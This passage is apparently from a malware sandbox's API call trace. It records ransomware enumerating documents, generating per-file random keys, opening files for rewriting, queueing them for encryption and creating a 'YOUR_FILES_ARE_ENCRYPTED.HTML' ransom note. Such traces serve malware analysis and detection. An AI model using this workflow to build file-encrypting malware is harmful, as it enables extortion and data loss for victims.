param_1="0A") returned 2 [0124.210] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="EE") returned 2 [0124.210] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="61") returned 2 [0124.210] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="98") returned 2 [0124.210] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="87") returned 2 [0124.211] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="A6") returned 2 [0124.211] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="E3") returned 2 [0124.211] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="CB") returned 2 [0124.211] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="D9") returned 2 [0124.211] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="35") returned 2 [0124.211] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="21") returned 2 [0124.211] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="16") returned 2 [0124.211] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="2D") returned 2 [0124.211] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="5D") returned 2 [0124.211] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="CD") returned 2 [0124.211] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="05") returned 2 [0124.211] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc" [0124.211] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.211] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.214] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf260ee10, ftCreationTime.dwHighDateTime=0x1d702af, ftLastAccessTime.dwLowDateTime=0x4f7d86a0, ftLastAccessTime.dwHighDateTime=0x1d7052e, ftLastWriteTime.dwLowDateTime=0x4f7d86a0, ftLastWriteTime.dwHighDateTime=0x1d7052e, nFileSizeHigh=0x0, nFileSizeLow=0x14934, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="oL3boW.pps", cAlternateFileName="")) returned 1 [0124.216] StrStrIW (lpFirst="oL3boW.pps", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.216] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps") returned 91 [0124.216] PathFindExtensionW (pszPath="oL3boW.pps") returned=".pps" [0124.216] lstrlenW (lpString=".pps") returned 4 [0124.216] PathFindExtensionW (pszPath="oL3boW.pps") returned=".pps" [0124.216] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\ol3bow.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.217] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=84276) returned 1 [0124.217] GetProcessHeap () returned 0x600000 [0124.217] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.219] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="24") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="B2") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="8A") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="64") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="1D") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="B6") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="D7") returned 2 [0124.219] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="26") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="10") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="44") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="B5") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="44") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="FF") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="03") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="1A") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="86") returned 2 [0124.220] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="56") returned 2 [0124.220] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="F9") returned 2 [0124.220] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="A1") returned 2 [0124.220] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="7B") returned 2 [0124.220] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="8C") returned 2 [0124.220] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="D0") returned 2 [0124.220] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="57") returned 2 [0124.220] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="70") returned 2 [0124.220] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="97") returned 2 [0124.220] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="E8") returned 2 [0124.220] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="33") returned 2 [0124.220] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="F6") returned 2 [0124.220] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="EC") returned 2 [0124.220] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="16") returned 2 [0124.220] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="B8") returned 2 [0124.220] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="02") returned 2 [0124.221] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\oL3boW.pps" [0124.221] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.221] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.225] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85bfe9e0, ftCreationTime.dwHighDateTime=0x1d70346, ftLastAccessTime.dwLowDateTime=0xbb02e7f0, ftLastAccessTime.dwHighDateTime=0x1d70a45, ftLastWriteTime.dwLowDateTime=0xbb02e7f0, ftLastWriteTime.dwHighDateTime=0x1d70a45, nFileSizeHigh=0x0, nFileSizeLow=0x1687a, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="PK_RE.rtf", cAlternateFileName="")) returned 1 [0124.225] StrStrIW (lpFirst="PK_RE.rtf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.225] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf") returned 90 [0124.225] PathFindExtensionW (pszPath="PK_RE.rtf") returned=".rtf" [0124.225] lstrlenW (lpString=".rtf") returned 4 [0124.225] PathFindExtensionW (pszPath="PK_RE.rtf") returned=".rtf" [0124.225] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\pk_re.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.226] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=92282) returned 1 [0124.226] GetProcessHeap () returned 0x600000 [0124.226] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.226] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="2E") returned 2 [0124.226] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="26") returned 2 [0124.226] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="68") returned 2 [0124.226] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="7C") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="C6") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="B2") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="31") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="67") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="76") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="33") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="AD") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="B2") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="4E") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="E5") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="93") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="C6") returned 2 [0124.227] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="87") returned 2 [0124.227] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="15") returned 2 [0124.227] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="82") returned 2 [0124.227] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="BE") returned 2 [0124.227] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="20") returned 2 [0124.227] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="C9") returned 2 [0124.227] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="25") returned 2 [0124.227] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="D6") returned 2 [0124.227] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="DA") returned 2 [0124.227] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="0A") returned 2 [0124.227] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="9A") returned 2 [0124.227] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="ED") returned 2 [0124.227] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="04") returned 2 [0124.227] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="EB") returned 2 [0124.227] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="82") returned 2 [0124.227] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="7C") returned 2 [0124.228] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\PK_RE.rtf" [0124.228] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.228] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.231] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7fb5f0, ftCreationTime.dwHighDateTime=0x1d70232, ftLastAccessTime.dwLowDateTime=0xfd4e3970, ftLastAccessTime.dwHighDateTime=0x1d7043c, ftLastWriteTime.dwLowDateTime=0xfd4e3970, ftLastWriteTime.dwHighDateTime=0x1d7043c, nFileSizeHigh=0x0, nFileSizeLow=0xb4ee, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="td4CEUua6yjCTmb2.ppt", cAlternateFileName="TD4CEU~1.PPT")) returned 1 [0124.231] StrStrIW (lpFirst="td4CEUua6yjCTmb2.ppt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.232] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt") returned 101 [0124.232] PathFindExtensionW (pszPath="td4CEUua6yjCTmb2.ppt") returned=".ppt" [0124.232] lstrlenW (lpString=".ppt") returned 4 [0124.232] PathFindExtensionW (pszPath="td4CEUua6yjCTmb2.ppt") returned=".ppt" [0124.232] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\td4ceuua6yjctmb2.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.232] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=46318) returned 1 [0124.233] GetProcessHeap () returned 0x600000 [0124.233] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.233] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="49") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="3C") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="DE") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="9C") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="B9") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="66") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="7E") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="42") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="11") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="45") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="9D") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="F0") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="AC") returned 2 [0124.233] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="0D") returned 2 [0124.234] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="B7") returned 2 [0124.234] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="83") returned 2 [0124.234] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="FB") returned 2 [0124.234] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="D3") returned 2 [0124.234] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="9C") returned 2 [0124.234] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="33") returned 2 [0124.234] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="43") returned 2 [0124.234] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="2D") returned 2 [0124.234] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="1F") returned 2 [0124.234] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="1B") returned 2 [0124.234] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="E3") returned 2 [0124.234] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="89") returned 2 [0124.234] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="2A") returned 2 [0124.234] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="BE") returned 2 [0124.234] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="D3") returned 2 [0124.234] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="6F") returned 2 [0124.234] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="27") returned 2 [0124.274] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="30") returned 2 [0124.274] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\td4CEUua6yjCTmb2.ppt" [0124.274] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.275] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.275] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed30cf0, ftCreationTime.dwHighDateTime=0x1d6fcb6, ftLastAccessTime.dwLowDateTime=0xd89416b0, ftLastAccessTime.dwHighDateTime=0x1d70444, ftLastWriteTime.dwLowDateTime=0xd89416b0, ftLastWriteTime.dwHighDateTime=0x1d70444, nFileSizeHigh=0x0, nFileSizeLow=0xa14b, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="zgUDzZupJ.xlsx", cAlternateFileName="ZGUDZZ~1.XLS")) returned 1 [0124.275] StrStrIW (lpFirst="zgUDzZupJ.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.275] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx") returned 95 [0124.275] PathFindExtensionW (pszPath="zgUDzZupJ.xlsx") returned=".xlsx" [0124.275] lstrlenW (lpString=".xlsx") returned 5 [0124.275] PathFindExtensionW (pszPath="zgUDzZupJ.xlsx") returned=".xlsx" [0124.275] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\zgudzzupj.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.276] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=41291) returned 1 [0124.276] GetProcessHeap () returned 0x600000 [0124.276] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.278] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="5A") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="24") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="BF") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="3B") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="F9") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="A1") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="FE") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="BC") returned 2 [0124.278] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="86") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="08") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="F6") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="11") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="EA") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="AA") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="04") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="43") returned 2 [0124.279] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="0D") returned 2 [0124.279] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="D6") returned 2 [0124.279] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="48") returned 2 [0124.279] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="92") returned 2 [0124.279] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="20") returned 2 [0124.279] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="07") returned 2 [0124.279] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="D6") returned 2 [0124.279] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="D9") returned 2 [0124.279] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="12") returned 2 [0124.279] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="10") returned 2 [0124.279] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="5E") returned 2 [0124.279] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="20") returned 2 [0124.279] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="CD") returned 2 [0124.279] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="65") returned 2 [0124.279] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="A8") returned 2 [0124.279] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="60") returned 2 [0124.280] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\zgUDzZupJ.xlsx" [0124.280] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.280] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.280] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed30cf0, ftCreationTime.dwHighDateTime=0x1d6fcb6, ftLastAccessTime.dwLowDateTime=0xd89416b0, ftLastAccessTime.dwHighDateTime=0x1d70444, ftLastWriteTime.dwLowDateTime=0xd89416b0, ftLastWriteTime.dwHighDateTime=0x1d70444, nFileSizeHigh=0x0, nFileSizeLow=0xa14b, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="zgUDzZupJ.xlsx", cAlternateFileName="ZGUDZZ~1.XLS")) returned 0 [0124.280] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0124.280] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0124.280] GetProcessHeap () returned 0x600000 [0124.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 